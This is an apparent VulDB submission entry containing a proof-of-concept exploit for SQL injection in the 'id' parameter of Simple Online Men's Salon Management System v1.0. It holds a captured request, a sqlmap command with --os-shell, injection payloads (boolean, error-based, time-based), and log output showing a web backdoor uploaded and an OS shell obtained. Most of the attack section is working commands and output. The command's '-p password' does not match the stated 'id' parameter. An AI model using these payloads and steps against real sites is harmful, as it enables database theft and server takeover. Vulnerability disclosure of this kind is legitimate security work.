| tiêu đề | Simple Online Men's Salon Management System - SQL Injection |
|---|
| Mô tả | # Exploit Title: Simple Online Men's Salon Management System - SQL Injection
# Exploit Author: Pratik Shetty
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html
# Version: v1.0
# Tested on: Windows 11, Apache
Description:-
A SQL Injection issue in Simple Online Men's Salon Management System allows to get an complete Remote Access into the website. Access such as database, files and everything.
`
Payload used:-
python sqlmap.py -r read.TXT -p password --risk 2 --level 3 --os-shell
`
Parameter":-
read.txt file is our payload file
```
GET /msms/admin/?page=user/manage_user&id=3 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=06rf7g4o1p13b8d4kpci1fobjb
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```
`
Steps to reproduce:-
1. Here we take the GET method of "http://localhost/msms/admin/?page=user/manage_user&id=3" just this page only
2. In this we target our paramter as "id" and save it to a txt file.
3. Now we are gonna use "SQLMap" tool and with this following command
**python sqlmap.py -r read.TXT -p password --risk 2 --level 3 --os-shell**
4. As we can see we got the complete access of the server
```
[01:57:18] [INFO] testing 'MySQL UNION query (74) - 21 to 40 columns'
[01:57:18] [INFO] testing 'MySQL UNION query (74) - 41 to 60 columns'
[01:57:19] [INFO] testing 'MySQL UNION query (74) - 61 to 80 columns'
[01:57:20] [INFO] testing 'MySQL UNION query (74) - 81 to 100 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: page=user/manage_user&id=3' AND 4129=(SELECT (CASE WHEN (4129=4129) THEN 4129 ELSE (SELECT 2453 UNION SELECT 1417) END))-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=user/manage_user&id=3' AND (SELECT 7719 FROM(SELECT COUNT(*),CONCAT(0x7171706271,(SELECT (ELT(7719=7719,1))),0x716b717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vkYP
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=user/manage_user&id=3' AND (SELECT 4180 FROM (SELECT(SLEEP(5)))ffuw)-- mIxN
---
[01:58:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.4, Apache 2.4.56
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[01:58:04] [INFO] going to use a web backdoor for command prompt
[01:58:04] [INFO] fingerprinting the back-end DBMS operating system
[01:58:04] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
[01:58:10] [INFO] retrieved the web server document root: 'C:\xampp\htdocs'
[01:58:10] [INFO] retrieved web server absolute paths: 'C:/xampp/htdocs/msms/admin/index.php, C:/xampp/htdocs/msms/admin/user/manage_user.php'
[01:58:10] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[01:58:10] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:80/tmpuqhar.php
[01:58:10] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:80/tmpbfbsc.php
[01:58:10] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ls
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
'ls' is not recognized as an internal or external command,
operable program or batch file.
---
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'laptop-*********\pratik shetty'
os-shell>
```` |
|---|
| Nguồn | ⚠️ https://github.com/draco1725/POC/blob/main/Exploit/Simple%20Online%20Men's%20Salon%20Management%20System/SQL%20Injection |
|---|
| Người dùng | draco (UID 24011) |
|---|
| Đệ trình | 23/07/2023 22:40 (cách đây 3 những năm) |
|---|
| Kiểm duyệt | 27/07/2023 21:49 (4 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 235608 [SourceCodester Simple Online Mens Salon Management System 1.0 manage_user&id=3 ID Tiêm SQL] |
|---|
| điểm | 20 |
|---|